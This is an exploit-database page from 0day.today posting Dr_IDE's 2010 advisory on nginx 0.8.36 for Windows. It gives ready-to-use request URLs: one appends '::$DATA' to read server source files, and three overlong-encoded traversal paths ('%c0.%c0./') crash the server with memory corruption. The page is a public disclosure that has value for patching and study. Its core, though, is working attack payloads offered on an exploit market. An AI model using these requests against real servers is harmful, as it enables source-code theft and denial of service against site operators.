[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

nginx 0.8.36 Source Disclosure and DoS Vulnerabilities

Author
Dr_IDE
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12654
Category
dos / poc
Date add
11-06-2010
Platform
windows
======================================================
nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
======================================================


Issue 1: (Remote Source Disclosure)
- Description -
  
nginx 0.8.36 is a multi platform HTTP server. This vulnerability exists in the latest Windows version of the application available.
  
nginx on Windows is vulnerable to a remote source disclosure attack.
  
- Technical Details - (Source Download)
 
http://[ webserver IP][:port]index.html::$DATA
 
 
Issue 2: (Remote DoS (w/ Memory Corruption))
- Description -
 
nginx 0.8.36 (Windows) does not seem to handle encoded directory traversal attempts properly. The corrupted registers in the crash dump seem to be loaded with damaged path variables.
 
- Technical Details - (Remote DoS)
 
http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
 
http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%c0.%c0./%20
 
http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%20
 
These three attempts will overwrite memory registers with different parts of the internal path based on where they try and traverse to.




#  0day.today [2024-11-14]  #